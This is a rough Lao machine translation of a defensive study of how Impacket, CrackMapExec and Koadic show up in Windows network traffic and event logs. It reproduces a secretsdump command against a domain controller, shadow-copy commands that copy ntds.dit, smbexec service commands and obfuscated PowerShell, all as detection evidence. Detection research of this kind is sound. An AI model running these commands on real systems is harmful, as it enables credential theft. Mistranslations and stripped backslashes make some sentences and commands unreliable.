ວິທີການກວດພົບການໂຈມຕີໃນໂຄງສ້າງພື້ນຖານຂອງ Windows: ການສຶກສາເຄື່ອງມືແຮກເກີ

ຈໍານວນຂອງການໂຈມຕີໃນຂະແຫນງການບໍລິສັດແມ່ນເພີ່ມຂຶ້ນໃນແຕ່ລະປີ: ຕົວຢ່າງ ໃນປີ 2017, 13% ເຫດການທີ່ເປັນເອກະລັກໄດ້ຖືກບັນທຶກໄວ້ ​ເມື່ອ​ທຽບ​ໃສ່​ປີ 2016 ​ແລະ ​ໃນ​ທ້າຍ​ປີ 2018. 27% ເຫດການເພີ່ມເຕີມກ່ວາໃນໄລຍະທີ່ຜ່ານມາ. ລວມທັງຜູ້ທີ່ເຄື່ອງມືເຮັດວຽກຕົ້ນຕໍແມ່ນລະບົບປະຕິບັດການ Windows. ໃນປີ 2017-2018, APT Dragonfly, APT28, APT Muddy Water ​ໄດ້​ທຳ​ການ​ໂຈມ​ຕີ​ຕໍ່​ອົງການ​ລັດຖະບານ ​ແລະ​ທາງ​ທະຫານ​ໃນ​ຢູ​ໂຣບ, ອາ​ເມ​ລິ​ກາ​ເໜືອ ​ແລະ Saudi Arabia. ແລະພວກເຮົາໄດ້ໃຊ້ສາມເຄື່ອງມືສໍາລັບການນີ້ - Impacket, CrackMapExec и ໂຄອາດິກ. ລະຫັດແຫຼ່ງຂອງພວກເຂົາແມ່ນເປີດແລະສາມາດໃຊ້ໄດ້ໃນ GitHub.

ມັນເປັນມູນຄ່າທີ່ສັງເກດວ່າເຄື່ອງມືເຫຼົ່ານີ້ບໍ່ໄດ້ຖືກນໍາໃຊ້ສໍາລັບການເຈາະເບື້ອງຕົ້ນ, ແຕ່ເພື່ອພັດທະນາການໂຈມຕີພາຍໃນໂຄງສ້າງພື້ນຖານ. ຜູ້ໂຈມຕີໃຊ້ພວກມັນຢູ່ໃນຂັ້ນຕອນຕ່າງໆຂອງການໂຈມຕີຫຼັງຈາກການເຈາະຂອງ perimeter. ນີ້, ໂດຍວິທີທາງການ, ແມ່ນຍາກທີ່ຈະກວດພົບແລະມັກຈະມີພຽງແຕ່ການຊ່ວຍເຫຼືອຂອງເຕັກໂນໂລຢີ ການກໍານົດຮ່ອງຮອຍຂອງການປະນີປະນອມໃນການຈະລາຈອນເຄືອຂ່າຍ ຫຼືເຄື່ອງມືທີ່ອະນຸຍາດໃຫ້ ກວດພົບການກະ ທຳ ທີ່ຫ້າວຫັນຂອງຜູ້ໂຈມຕີຫຼັງຈາກທີ່ລາວໄດ້ເຂົ້າໄປໃນໂຄງສ້າງພື້ນຖານ. ເຄື່ອງມືສະຫນອງຫນ້າທີ່ຫລາກຫລາຍ, ຈາກການໂອນໄຟລ໌ໄປຫາການໂຕ້ຕອບກັບທະບຽນແລະການປະຕິບັດຄໍາສັ່ງໃນເຄື່ອງຫ່າງໄກສອກຫຼີກ. ພວກເຮົາໄດ້ເຮັດການສຶກສາກ່ຽວກັບເຄື່ອງມືເຫຼົ່ານີ້ເພື່ອກໍານົດກິດຈະກໍາເຄືອຂ່າຍຂອງພວກເຂົາ.

ສິ່ງທີ່ພວກເຮົາຈໍາເປັນຕ້ອງເຮັດ:

• ເຂົ້າໃຈວິທີການ hacking ເຄື່ອງມືເຮັດວຽກ. ຊອກຫາສິ່ງທີ່ຜູ້ໂຈມຕີຕ້ອງການໃຊ້ປະໂຫຍດ ແລະເທັກໂນໂລຍີໃດທີ່ເຂົາເຈົ້າສາມາດໃຊ້.
• ຊອກຫາສິ່ງທີ່ບໍ່ຖືກກວດພົບໂດຍເຄື່ອງມືຄວາມປອດໄພຂໍ້ມູນໃນຂັ້ນຕອນທໍາອິດຂອງການໂຈມຕີ. ໄລຍະການສອດແນມອາດຈະຖືກຂ້າມໄປ, ບໍ່ວ່າຈະເປັນຍ້ອນວ່າຜູ້ໂຈມຕີເປັນຜູ້ໂຈມຕີພາຍໃນ, ຫຼືຍ້ອນວ່າຜູ້ໂຈມຕີກໍາລັງຂຸດຄົ້ນຂຸມໃນໂຄງສ້າງພື້ນຖານທີ່ບໍ່ຮູ້ມາກ່ອນ. ມັນເປັນໄປໄດ້ທີ່ຈະຟື້ນຟູລະບົບຕ່ອງໂສ້ທັງຫມົດຂອງການກະທໍາຂອງລາວ, ດັ່ງນັ້ນຄວາມປາຖະຫນາທີ່ຈະກວດພົບການເຄື່ອນໄຫວຕື່ມອີກ.
• ກໍາຈັດຜົນບວກທີ່ບໍ່ຖືກຕ້ອງຈາກເຄື່ອງມືກວດຫາການບຸກລຸກ. ພວກເຮົາຕ້ອງບໍ່ລືມວ່າໃນເວລາທີ່ການດໍາເນີນການສະເພາະໃດຫນຶ່ງຖືກກວດພົບບົນພື້ນຖານຂອງ reconnaissance ດຽວ, ຄວາມຜິດພາດເລື້ອຍໆແມ່ນເປັນໄປໄດ້. ປົກກະຕິແລ້ວໃນໂຄງສ້າງພື້ນຖານມີຈໍານວນພຽງພໍຂອງວິທີການ, indistinguishable ຈາກອັນທີ່ຖືກຕ້ອງຢູ່ glance ທໍາອິດ, ເພື່ອໃຫ້ໄດ້ຮັບຂໍ້ມູນໃດໆ.

ເຄື່ອງມືເຫຼົ່ານີ້ໃຫ້ຜູ້ໂຈມຕີຫຍັງ? ຖ້າຫາກວ່ານີ້ແມ່ນ Impacket, ຫຼັງຈາກນັ້ນຜູ້ໂຈມຕີໄດ້ຮັບຫ້ອງສະຫມຸດຂະຫນາດໃຫຍ່ຂອງໂມດູນທີ່ສາມາດໄດ້ຮັບການນໍາໃຊ້ໃນໄລຍະທີ່ແຕກຕ່າງກັນຂອງການໂຈມຕີທີ່ປະຕິບັດຕາມຫຼັງຈາກ breaking perimeter ໄດ້. ເຄື່ອງມືຈໍານວນຫຼາຍໃຊ້ໂມດູນ Impacket ພາຍໃນ - ຕົວຢ່າງ, Metasploit. ມັນມີ dcomexec ແລະ wmiexec ສໍາລັບການປະຕິບັດຄໍາສັ່ງຫ່າງໄກສອກຫຼີກ, secretsdump ສໍາລັບການໄດ້ຮັບບັນຊີຈາກຫນ່ວຍຄວາມຈໍາທີ່ເພີ່ມຈາກ Impacket. ດັ່ງນັ້ນ, ການກວດສອບຄວາມຖືກຕ້ອງຂອງກິດຈະກໍາຂອງຫ້ອງສະຫມຸດດັ່ງກ່າວຈະຮັບປະກັນການກວດພົບຂອງອະນຸພັນ.

ມັນບໍ່ແມ່ນເລື່ອງບັງເອີນທີ່ຜູ້ສ້າງຂຽນວ່າ "Powered by Impacket" ກ່ຽວກັບ CrackMapExec (ຫຼືພຽງແຕ່ CME). ນອກຈາກນັ້ນ, CME ມີຫນ້າທີ່ກຽມພ້ອມສໍາລັບສະຖານະການທີ່ນິຍົມ: Mimikatz ສໍາລັບການໄດ້ຮັບລະຫັດຜ່ານຫຼື hashes ຂອງເຂົາເຈົ້າ, ການປະຕິບັດ Meterpreter ຫຼື Empire ຕົວແທນສໍາລັບການປະຕິບັດຫ່າງໄກສອກຫຼີກ, ແລະ Bloodhound ເທິງເຮືອ.

ເຄື່ອງມືທີສາມທີ່ພວກເຮົາເລືອກແມ່ນ Koadic. ມັນແມ່ນຂ້ອນຂ້າງບໍ່ດົນມານີ້, ມັນຖືກນໍາສະເຫນີຢູ່ໃນກອງປະຊຸມສາກົນຂອງແຮກເກີ DEFCON 25 ໃນ 2017 ແລະຖືກຈໍາແນກໂດຍວິທີການທີ່ບໍ່ແມ່ນມາດຕະຖານ: ມັນເຮັດວຽກຜ່ານ HTTP, Java Script ແລະ Microsoft Visual Basic Script (VBS). ວິທີການນີ້ເອີ້ນວ່າການດໍາລົງຊີວິດ off ທີ່ດິນ: ເຄື່ອງມືນໍາໃຊ້ຊຸດຂອງ dependencies ແລະຫ້ອງສະຫມຸດທີ່ສ້າງຂຶ້ນໃນ Windows. ຜູ້ສ້າງເອີ້ນມັນວ່າ COM Command & Control, ຫຼື C3.

ຜົນກະທົບ

ການເຮັດວຽກຂອງ Impacket ແມ່ນກວ້າງຫຼາຍ, ຕັ້ງແຕ່ການສອດແນມພາຍໃນ AD ແລະເກັບກໍາຂໍ້ມູນຈາກເຄື່ອງແມ່ຂ່າຍ MS SQL ພາຍໃນ, ເຕັກນິກການໄດ້ຮັບຂໍ້ມູນປະຈໍາຕົວ: ນີ້ແມ່ນການໂຈມຕີ SMB relay, ແລະການໄດ້ຮັບໄຟລ໌ ntds.dit ທີ່ມີ hashes ຂອງລະຫັດຜ່ານຂອງຜູ້ໃຊ້ຈາກຕົວຄວບຄຸມໂດເມນ. Impacket ຍັງປະຕິບັດຄໍາສັ່ງຫ່າງໄກສອກຫຼີກໂດຍໃຊ້ສີ່ວິທີທີ່ແຕກຕ່າງກັນ: WMI, Windows Scheduler Management Service, DCOM, ແລະ SMB, ແລະຕ້ອງການຂໍ້ມູນປະຈໍາເພື່ອເຮັດແນວນັ້ນ.

ຄວາມລັບ

ລອງມາເບິ່ງເລື່ອງລັບໆ. ນີ້ແມ່ນໂມດູນທີ່ສາມາດເປົ້າຫມາຍທັງເຄື່ອງຈັກຂອງຜູ້ໃຊ້ແລະຕົວຄວບຄຸມໂດເມນ. ມັນສາມາດຖືກນໍາໃຊ້ເພື່ອໃຫ້ໄດ້ສໍາເນົາພື້ນທີ່ຫນ່ວຍຄວາມຈໍາ LSA, SAM, SECURITY, NTDS.dit, ດັ່ງນັ້ນມັນສາມາດເຫັນໄດ້ໃນຂັ້ນຕອນຕ່າງໆຂອງການໂຈມຕີ. ຂັ້ນຕອນທໍາອິດໃນການດໍາເນີນງານຂອງໂມດູນແມ່ນການກວດສອບຜ່ານ SMB, ເຊິ່ງຕ້ອງການລະຫັດຜ່ານຂອງຜູ້ໃຊ້ຫຼື hash ຂອງມັນເພື່ອປະຕິບັດການໂຈມຕີ Pass the Hash ໂດຍອັດຕະໂນມັດ. ຕໍ່ໄປແມ່ນການຮ້ອງຂໍໃຫ້ເປີດການເຂົ້າເຖິງ Service Control Manager (SCM) ແລະເຂົ້າເຖິງການລົງທະບຽນຜ່ານ winreg protocol, ໂດຍໃຊ້ທີ່ຜູ້ໂຈມຕີສາມາດຊອກຫາຂໍ້ມູນສາຂາທີ່ມີຄວາມສົນໃຈແລະໄດ້ຮັບຜົນໄດ້ຮັບຜ່ານ SMB.

ໃນຮູບ. 1 ພວກເຮົາເບິ່ງວ່າໃນເວລາທີ່ໃຊ້ winreg protocol, ການເຂົ້າເຖິງແມ່ນໄດ້ຮັບໂດຍໃຊ້ລະຫັດລີຈິດຊີທີ່ມີ LSA. ເພື່ອເຮັດສິ່ງນີ້, ໃຊ້ຄໍາສັ່ງ DCERPC ກັບ opcode 15 - OpenKey.

ເຂົ້າ. 1. ການເປີດລະຫັດການລົງທະບຽນໂດຍໃຊ້ winreg protocol

ຕໍ່ໄປ, ເມື່ອໄດ້ຮັບການເຂົ້າເຖິງທີ່ສໍາຄັນ, ມູນຄ່າຖືກບັນທຶກໄວ້ດ້ວຍຄໍາສັ່ງ SaveKey ກັບ opcode 20. Impacket ເຮັດແບບນີ້ໃນລັກສະນະສະເພາະ. ມັນບັນທຶກຄ່າຕ່າງໆໃສ່ໄຟລ໌ທີ່ມີຊື່ເປັນ 8 ຕົວອັກສອນສຸ່ມຕໍ່ທ້າຍດ້ວຍ .tmp. ນອກຈາກນັ້ນ, ການອັບໂຫລດໄຟລ໌ນີ້ເພີ່ມເຕີມເກີດຂຶ້ນຜ່ານ SMB ຈາກໄດເລກະທໍລີ System32 (ຮູບ 2).

ເຂົ້າ. 2. ໂຄງ​ການ​ສໍາ​ລັບ​ການ​ໄດ້​ຮັບ​ກະ​ແຈ​ການ​ຈົດ​ທະ​ບຽນ​ຈາກ​ເຄື່ອງ​ຫ່າງ​ໄກ​ສອກ​ຫຼີກ​

ມັນປະກົດວ່າກິດຈະກໍາດັ່ງກ່າວຢູ່ໃນເຄືອຂ່າຍສາມາດກວດພົບໄດ້ໂດຍການສອບຖາມກັບສາຂາການລົງທະບຽນບາງຢ່າງໂດຍໃຊ້ໂປໂຕຄອນ winreg, ຊື່ສະເພາະ, ຄໍາສັ່ງແລະຄໍາສັ່ງຂອງພວກເຂົາ.

ໂມດູນນີ້ຍັງປ່ອຍໃຫ້ຮ່ອງຮອຍຢູ່ໃນບັນທຶກເຫດການ Windows, ເຮັດໃຫ້ມັນງ່າຍຕໍ່ການກວດພົບ. ຕົວຢ່າງ, ເປັນຜົນມາຈາກການປະຕິບັດຄໍາສັ່ງ

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ໃນບັນທຶກຂອງ Windows Server 2016 ພວກເຮົາຈະເຫັນລໍາດັບເຫດການສໍາຄັນຕໍ່ໄປນີ້:

1. 4624 - remote Logon.
2. 5145 - ການກວດສອບສິດການເຂົ້າເຖິງການບໍລິການທາງໄກ winreg.
3. 5145 - ການກວດສອບສິດການເຂົ້າເຖິງໄຟລ໌ໃນລະບົບ System32. ໄຟລ໌ມີຊື່ແບບສຸ່ມທີ່ໄດ້ກ່າວມາຂ້າງເທິງ.
4. 4688 - ການສ້າງຂະບວນການ cmd.exe ທີ່ເປີດຕົວ vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ການສ້າງຂະບວນການດ້ວຍຄໍາສັ່ງ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ການສ້າງຂະບວນການດ້ວຍຄໍາສັ່ງ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ການສ້າງຂະບວນການດ້ວຍຄໍາສັ່ງ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ເຊັ່ນດຽວກັນກັບເຄື່ອງມືຫຼັງການຂູດຮີດຈໍານວນຫຼາຍ, Impacket ມີໂມດູນສໍາລັບການປະຕິບັດຄໍາສັ່ງຫ່າງໄກສອກຫຼີກ. ພວກເຮົາຈະສຸມໃສ່ smbexec, ເຊິ່ງສະຫນອງ shell ຄໍາສັ່ງການໂຕ້ຕອບໃນເຄື່ອງຫ່າງໄກສອກຫຼີກ. ໂມດູນນີ້ຍັງຕ້ອງການການພິສູດຢືນຢັນຜ່ານ SMB, ບໍ່ວ່າຈະເປັນລະຫັດຜ່ານຫຼື hash ລະຫັດຜ່ານ. ໃນຮູບ. ໃນຮູບທີ 3 ພວກເຮົາເຫັນຕົວຢ່າງຂອງວິທີການເຮັດວຽກຂອງເຄື່ອງມືດັ່ງກ່າວ, ໃນກໍລະນີນີ້ມັນແມ່ນ console ຂອງຜູ້ບໍລິຫານທ້ອງຖິ່ນ.

ເຂົ້າ. 3. Interactive smbexec console

ຂັ້ນຕອນທໍາອິດຂອງ smbexec ຫຼັງຈາກການພິສູດຢືນຢັນແມ່ນເພື່ອເປີດ SCM ດ້ວຍຄໍາສັ່ງ OpenSCManagerW (15). ການສອບຖາມແມ່ນຫນ້າສັງເກດ: ພາກສະຫນາມ MachineName ແມ່ນ DUMMY.

ເຂົ້າ. 4. ຮ້ອງຂໍໃຫ້ເປີດ Service Control Manager

ຕໍ່ໄປ, ການບໍລິການຖືກສ້າງຂື້ນໂດຍໃຊ້ຄໍາສັ່ງ CreateServiceW (12). ໃນກໍລະນີຂອງ smbexec, ພວກເຮົາສາມາດເຫັນເຫດຜົນການກໍ່ສ້າງຄໍາສັ່ງດຽວກັນທຸກຄັ້ງ. ໃນຮູບ. 5 ສີຂຽວສະແດງເຖິງຕົວກໍານົດຄໍາສັ່ງທີ່ບໍ່ສາມາດປ່ຽນແປງໄດ້, ສີເຫຼືອງຊີ້ໃຫ້ເຫັນເຖິງສິ່ງທີ່ຜູ້ໂຈມຕີສາມາດປ່ຽນແປງໄດ້. ມັນງ່າຍທີ່ຈະເຫັນວ່າຊື່ຂອງໄຟລ໌ທີ່ສາມາດປະຕິບັດໄດ້, ໄດເລກະທໍລີຂອງມັນແລະໄຟລ໌ຜົນຜະລິດສາມາດປ່ຽນແປງໄດ້, ແຕ່ສ່ວນທີ່ເຫຼືອແມ່ນມີຄວາມຫຍຸ້ງຍາກຫຼາຍທີ່ຈະປ່ຽນໂດຍບໍ່ມີການລົບກວນເຫດຜົນຂອງໂມດູນ Impacket.

ເຂົ້າ. 5. ຮ້ອງຂໍໃຫ້ສ້າງບໍລິການໂດຍໃຊ້ Service Control Manager

Smbexec ຍັງປ່ອຍໃຫ້ຮ່ອງຮອຍທີ່ຊັດເຈນຢູ່ໃນບັນທຶກເຫດການ Windows. ໃນບັນທຶກຂອງ Windows Server 2016 ສໍາລັບແກະຄໍາສັ່ງແບບໂຕ້ຕອບກັບຄໍາສັ່ງ ipconfig, ພວກເຮົາຈະເຫັນລໍາດັບເຫດການສໍາຄັນຕໍ່ໄປນີ້:

1. 4697 — ການ​ຕິດ​ຕັ້ງ​ການ​ບໍ​ລິ​ການ​ໃນ​ເຄື່ອງ​ຂອງ​ຜູ້​ເຄາະ​ຮ້າຍ​:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ການສ້າງຂະບວນການ cmd.exe ດ້ວຍການໂຕ້ຖຽງຈາກຈຸດ 1.
3. 5145 - ການກວດສອບສິດການເຂົ້າເຖິງໄຟລ໌ __output ໃນໄດເລກະທໍລີ C$.
4. 4697 — ການ​ຕິດ​ຕັ້ງ​ການ​ບໍ​ລິ​ການ​ໃນ​ເຄື່ອງ​ຂອງ​ຜູ້​ຖືກ​ເຄາະ​ຮ້າຍ​.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ການສ້າງຂະບວນການ cmd.exe ດ້ວຍການໂຕ້ຖຽງຈາກຈຸດ 4.
6. 5145 - ການກວດສອບສິດການເຂົ້າເຖິງໄຟລ໌ __output ໃນໄດເລກະທໍລີ C$.

Impacket ແມ່ນພື້ນຖານສໍາລັບການພັດທະນາເຄື່ອງມືການໂຈມຕີ. ມັນສະຫນັບສະຫນູນເກືອບທຸກໂປໂຕຄອນໃນໂຄງສ້າງພື້ນຖານຂອງ Windows ແລະໃນເວລາດຽວກັນມີລັກສະນະລັກສະນະຂອງຕົນເອງ. ນີ້ແມ່ນຄໍາຮ້ອງຂໍ winreg ສະເພາະ, ແລະການນໍາໃຊ້ SCM API ກັບການສ້າງຄໍາສັ່ງລັກສະນະ, ແລະຮູບແບບຊື່ໄຟລ໌, ແລະ SMB ແບ່ງປັນ SYSTEM32.

CRACKMAPEXEC

ເຄື່ອງມື CME ໄດ້ຖືກອອກແບບຕົ້ນຕໍເພື່ອອັດຕະໂນມັດການປະຕິບັດປົກກະຕິເຫຼົ່ານັ້ນທີ່ຜູ້ໂຈມຕີຕ້ອງເຮັດເພື່ອກ້າວຫນ້າພາຍໃນເຄືອຂ່າຍ. ມັນອະນຸຍາດໃຫ້ທ່ານເຮັດວຽກຮ່ວມກັນກັບຕົວແທນ Empire ທີ່ມີຊື່ສຽງແລະ Meterpreter. ເພື່ອປະຕິບັດຄໍາສັ່ງລັບໆ, CME ສາມາດເຮັດໃຫ້ພວກເຂົາສັບສົນ. ການນໍາໃຊ້ Bloodhound (ເຄື່ອງມືການສອດແນມແຍກຕ່າງຫາກ), ຜູ້ໂຈມຕີສາມາດອັດຕະໂນມັດການຄົ້ນຫາສໍາລັບກອງປະຊຸມຜູ້ເບິ່ງແຍງໂດເມນທີ່ມີການເຄື່ອນໄຫວ.

ການນອງເລືອດ

Bloodhound, ເປັນເຄື່ອງມື standalone, ອະນຸຍາດໃຫ້ສໍາລັບການ reconnaissance ກ້າວຫນ້າທາງດ້ານໃນເຄືອຂ່າຍ. ມັນລວບລວມຂໍ້ມູນກ່ຽວກັບຜູ້ໃຊ້, ເຄື່ອງຈັກ, ກຸ່ມ, ເຊດຊັນ ແລະຖືກສະໜອງໃຫ້ເປັນ PowerShell script ຫຼື binary file. LDAP ຫຼື SMB-based protocols ຖືກນໍາໃຊ້ເພື່ອເກັບກໍາຂໍ້ມູນ. ໂມດູນການລວມຕົວ CME ອະນຸຍາດໃຫ້ Bloodhound ດາວໂຫຼດໃສ່ເຄື່ອງຂອງຜູ້ເຄາະຮ້າຍ, ແລ່ນແລະຮັບຂໍ້ມູນທີ່ເກັບກໍາຫຼັງຈາກການປະຕິບັດ, ດັ່ງນັ້ນການດໍາເນີນການອັດຕະໂນມັດໃນລະບົບແລະເຮັດໃຫ້ພວກເຂົາສັງເກດເຫັນຫນ້ອຍລົງ. ແກະກາຟິກ Bloodhound ນໍາສະເຫນີຂໍ້ມູນທີ່ເກັບກໍາໃນຮູບແບບຂອງກາຟ, ເຊິ່ງຊ່ວຍໃຫ້ທ່ານສາມາດຊອກຫາເສັ້ນທາງທີ່ສັ້ນທີ່ສຸດຈາກເຄື່ອງຂອງຜູ້ໂຈມຕີໄປຫາຜູ້ເບິ່ງແຍງໂດເມນ.

ເຂົ້າ. 6. ການໂຕ້ຕອບ Bloodhound

ເພື່ອດໍາເນີນການຢູ່ໃນເຄື່ອງຂອງຜູ້ຖືກເຄາະຮ້າຍ, ໂມດູນຈະສ້າງວຽກງານໂດຍໃຊ້ ATSVC ແລະ SMB. ATSVC ແມ່ນການໂຕ້ຕອບສໍາລັບການເຮັດວຽກກັບ Windows Task Scheduler. CME ໃຊ້ຟັງຊັນ NetrJobAdd(1) ເພື່ອສ້າງວຽກຜ່ານເຄືອຂ່າຍ. ຕົວຢ່າງຂອງສິ່ງທີ່ໂມດູນ CME ສົ່ງແມ່ນສະແດງຢູ່ໃນຮູບ. 7: ນີ້ແມ່ນການເອີ້ນຄໍາສັ່ງ cmd.exe ແລະລະຫັດ obfuscated ໃນຮູບແບບການໂຕ້ຖຽງໃນຮູບແບບ XML.

Fig.7. ສ້າງໜ້າວຽກຜ່ານ CME

ຫຼັງຈາກວຽກງານໄດ້ຖືກສົ່ງເພື່ອປະຕິບັດ, ເຄື່ອງຂອງຜູ້ຖືກເຄາະຮ້າຍເລີ່ມຕົ້ນ Bloodhound ຕົວຂອງມັນເອງ, ແລະນີ້ສາມາດເຫັນໄດ້ໃນການຈະລາຈອນ. ໂມດູນແມ່ນມີລັກສະນະໂດຍການສອບຖາມ LDAP ເພື່ອໃຫ້ໄດ້ຮັບກຸ່ມມາດຕະຖານ, ບັນຊີລາຍຊື່ຂອງເຄື່ອງຈັກແລະຜູ້ໃຊ້ທັງຫມົດໃນໂດເມນ, ແລະໄດ້ຮັບຂໍ້ມູນກ່ຽວກັບກອງປະຊຸມຜູ້ໃຊ້ທີ່ມີການເຄື່ອນໄຫວໂດຍຜ່ານຄໍາຮ້ອງຂໍ SRVSVC NetSessEnum.

ເຂົ້າ. 8. ໄດ້ຮັບບັນຊີລາຍຊື່ຂອງກອງປະຊຸມທີ່ມີການເຄື່ອນໄຫວຜ່ານ SMB

ນອກຈາກນັ້ນ, ການເປີດຕົວ Bloodhound ໃນເຄື່ອງຂອງຜູ້ເຄາະຮ້າຍທີ່ມີການເປີດໃຊ້ການກວດສອບແມ່ນມາພ້ອມກັບເຫດການທີ່ມີ ID 4688 (ການສ້າງຂະບວນການ) ແລະຊື່ຂະບວນການ. «C:WindowsSystem32cmd.exe». ສິ່ງທີ່ເປັນຕາສັງເກດແມ່ນ arguments ແຖວຄໍາສັ່ງ:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

ໂມດູນ enum_avproducts ແມ່ນຫນ້າສົນໃຈຫຼາຍຈາກຈຸດຂອງການທໍາງານແລະການຈັດຕັ້ງປະຕິບັດ. WMI ອະນຸຍາດໃຫ້ທ່ານໃຊ້ພາສາສອບຖາມ WQL ເພື່ອດຶງຂໍ້ມູນຈາກວັດຖຸ Windows ຕ່າງໆ, ເຊິ່ງເປັນສິ່ງຈໍາເປັນທີ່ໂມດູນ CME ນີ້ໃຊ້. ມັນສ້າງການສອບຖາມກັບຫ້ອງຮຽນ AntiSpywareProduct ແລະ AntiМirusProduct ກ່ຽວກັບເຄື່ອງມືປ້ອງກັນທີ່ຕິດຕັ້ງຢູ່ໃນເຄື່ອງຂອງຜູ້ເຄາະຮ້າຍ. ເພື່ອໃຫ້ໄດ້ຮັບຂໍ້ມູນທີ່ຈໍາເປັນ, ໂມດູນເຊື່ອມຕໍ່ກັບ namespace rootSecurityCenter2, ຫຼັງຈາກນັ້ນສ້າງຄໍາຖາມ WQL ແລະໄດ້ຮັບການຕອບສະຫນອງ. ໃນຮູບ. ຮູບທີ 9 ສະແດງໃຫ້ເຫັນເນື້ອໃນຂອງການຮ້ອງຂໍແລະການຕອບສະຫນອງດັ່ງກ່າວ. ໃນຕົວຢ່າງຂອງພວກເຮົາ, Windows Defender ໄດ້ຖືກພົບເຫັນ.

ເຂົ້າ. 9. ກິດຈະກໍາເຄືອຂ່າຍຂອງໂມດູນ enum_avproducts

ເລື້ອຍໆ, ການກວດສອບ WMI (Trace WMI-Activity), ໃນເຫດການທີ່ເຈົ້າສາມາດຊອກຫາຂໍ້ມູນທີ່ເປັນປະໂຫຍດກ່ຽວກັບການສອບຖາມ WQL, ອາດຈະຖືກປິດໃຊ້ງານ. ແຕ່ຖ້າມັນຖືກເປີດໃຊ້, ຫຼັງຈາກນັ້ນຖ້າສະຄິບ enum_avproducts ຖືກແລ່ນ, ເຫດການທີ່ມີ ID 11 ຈະຖືກບັນທຶກໄວ້ມັນຈະມີຊື່ຂອງຜູ້ໃຊ້ທີ່ສົ່ງຄໍາຮ້ອງຂໍແລະຊື່ໃນ namespace rootSecurityCenter2.

ແຕ່ລະໂມດູນ CME ມີສິ່ງປະດິດຂອງຕົນເອງ, ບໍ່ວ່າຈະເປັນການສອບຖາມ WQL ສະເພາະຫຼືການສ້າງປະເພດຂອງວຽກງານສະເພາະໃດຫນຶ່ງໃນຕາຕະລາງວຽກງານທີ່ມີ obfuscation ແລະກິດຈະກໍາສະເພາະ Bloodhound ໃນ LDAP ແລະ SMB.

KOADIC

ລັກສະນະທີ່ໂດດເດັ່ນຂອງ Koadic ແມ່ນການໃຊ້ຕົວແປພາສາ JavaScript ແລະ VBScript ທີ່ສ້າງຂຶ້ນໃນ Windows. ໃນຄວາມຫມາຍນີ້, ມັນປະຕິບັດຕາມແນວໂນ້ມການດໍາລົງຊີວິດຂອງແຜ່ນດິນ - ນັ້ນແມ່ນ, ມັນບໍ່ມີການເພິ່ງພາອາໄສພາຍນອກແລະໃຊ້ເຄື່ອງມື Windows ມາດຕະຖານ. ນີ້​ແມ່ນ​ເຄື່ອງ​ມື​ສໍາ​ລັບ​ຄໍາ​ສັ່ງ​ແລະ​ການ​ຄວບ​ຄຸມ (CnC​) ຢ່າງ​ເຕັມ​ທີ່​, ນັບ​ຕັ້ງ​ແຕ່​ຫຼັງ​ຈາກ​ການ​ຕິດ​ເຊື້ອ "implant​" ຖືກ​ຕິດ​ຕັ້ງ​ໃນ​ເຄື່ອງ​, ເຮັດ​ໃຫ້​ມັນ​ສາ​ມາດ​ຄວບ​ຄຸມ​ໄດ້​. ເຄື່ອງດັ່ງກ່າວ, ໃນຄໍາສັບພາສາ Koadic, ຖືກເອີ້ນວ່າ "ຜີດິບ." ຖ້າມີສິດທິພິເສດທີ່ບໍ່ພຽງພໍສໍາລັບການປະຕິບັດງານຢ່າງເຕັມທີ່ຢູ່ໃນຝ່າຍຂອງຜູ້ຖືກເຄາະຮ້າຍ, Koadic ມີຄວາມສາມາດທີ່ຈະຍົກສູງພວກເຂົາໂດຍໃຊ້ເຕັກນິກການຄວບຄຸມບັນຊີຜູ້ໃຊ້ (UAC bypass).

ເຂົ້າ. 10. ໂກດິກ Shell

ຜູ້ຖືກເຄາະຮ້າຍຕ້ອງເລີ່ມຕົ້ນການສື່ສານກັບເຄື່ອງແມ່ຂ່າຍຄໍາສັ່ງ & ການຄວບຄຸມ. ເພື່ອເຮັດສິ່ງນີ້, ນາງຕ້ອງການຕິດຕໍ່ກັບ URI ທີ່ກຽມໄວ້ກ່ອນຫນ້ານີ້ແລະໄດ້ຮັບຮ່າງກາຍ Koadic ຕົ້ນຕໍໂດຍໃຊ້ຫນຶ່ງໃນ stagers. ໃນຮູບ. ຮູບທີ 11 ສະແດງຕົວຢ່າງສໍາລັບ mshta stager.

ເຂົ້າ. 11. ການເລີ່ມຕົ້ນເຊດຊັນກັບເຊີບເວີ CnC

